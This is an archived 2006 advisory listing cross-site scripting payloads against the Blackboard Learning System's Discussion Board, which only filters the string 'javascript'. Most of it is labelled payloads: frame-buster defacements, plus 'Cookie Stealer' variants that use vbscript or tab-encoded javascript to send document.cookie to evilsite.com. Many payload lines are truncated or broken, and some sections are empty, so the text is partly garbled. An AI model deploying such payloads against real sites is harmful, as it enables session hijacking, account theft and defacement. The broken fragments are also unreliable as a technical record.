AOH :: HP Unsorted B :: B06-4399.HTM

BlackBoard Multiple Vulnerabilities (XSS)



BlackBoard Multiple Vulnerabilities (XSS)
BlackBoard Multiple Vulnerabilities (XSS)



-----------------------------------------------------------------------------------------

Found by: PrOtOn & digi7al64

Date: May 20th 2006

Critical Level: High

Type: Multiple Cross Site Scripting (XSS) vunerabilities


------------------------------------------------------------------------------------------


Software:
Blackboard Learning System (Release 6) Blackboard Learning and Community Portal Suite (Release6)-6.2.3.23


------------------------------------------------------------------------------------------


Explanation: You can inject HTML, VB code and or Javascript into specific tags to steal
cookies, deface the site using frame busters or even redirect to external sites for phishing purposes.
If you have limited access, then a simple post into the Discussion Board using the right
tags with the right code (provided below) will execute the vulnerability(ies).


-------------------------------------------------------------------------------------------

About:
Blackboards parsing system only checks for the string "javascript", Thus vbscript code can be injected at will into tags as well as any versions of javascript that uses uncommon syntax (ie tabs encoding etc)

-------------------------------------------------------------------------------------------
Vulnerabilities:

Defacement (FrameBuster)
-------------------------
">http://evilsite.com">


Defacement (FrameBuster)
-------------------------



Defacement (IE ONLY)
-------------------------



Defacement (IE ONLY)
-------------------------





Cookie Stealer (IE ONLY)
-------------------------

src="vbscript:wintest=window.open(%22http://evilsite.com + document.cookie)"style=visibility:hidden/>




Cookie Stealer (IE ONLY)
-------------------------
">href="vbscript:wintest=window.open(%22http://evilsite.com+document.cookie)">


Cookie Stealer (Encoded Tab - IE ONLY)
-------------------------
document.images[1].src=%22http://evilsite.com+document.cookie;" src="jav
">ascript:document.images[1].src=%22http://evilsite.com+document.cookie;"style=visibility:hidden/>


Cookie Stealer (html encoded - IE ONLY)
-------------------------
http://evilsite.com"+document.cookie;'
src="jav
">ascript:document.images[1].src=%22http://evilsite.com+document.cookie;"style=visibility:hidden/>


Cookie Stealer (tabs - IE ONLY)
-------------------------
">ascript:document.images[1].src=%22http://evilsite.com+document.cookie;"style=visibility:hidden/>


Cookie Stealer (body tag with tabs - IE ONLY)
-------------------------
">ascript:document.images[1].src=%22http://evilsite.com+document.cookie;">


Cookie Stealer (div tag with tabs - IE ONLY)
-------------------------
">ascript:document.images[1].src=%22http://evilsite.com+document.cookie;)"> Cookie Stealer (firefox) ------------------------- Cookie Stealer (firefox - click to work) ------------------------- hmmm --------------------------------------------------------------------------------------------- Disclaimer: Myself or any other person involved with this discovery will not be responsible for what you do with this information. Blackboard developers have been contacted by me and a patch has been released according to them. ----------------------------------------------------------------------------------------------- Shout Outs: r0xes, criticalsecurity(dot)net, Infowar(dot)com ------------------------------------------------------------------------------------------------ Contact: Pr070n(at)gmail(dot)com Digi7al64(at)gmail(dot)com -------------------------------------------------------------------------------------------------

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.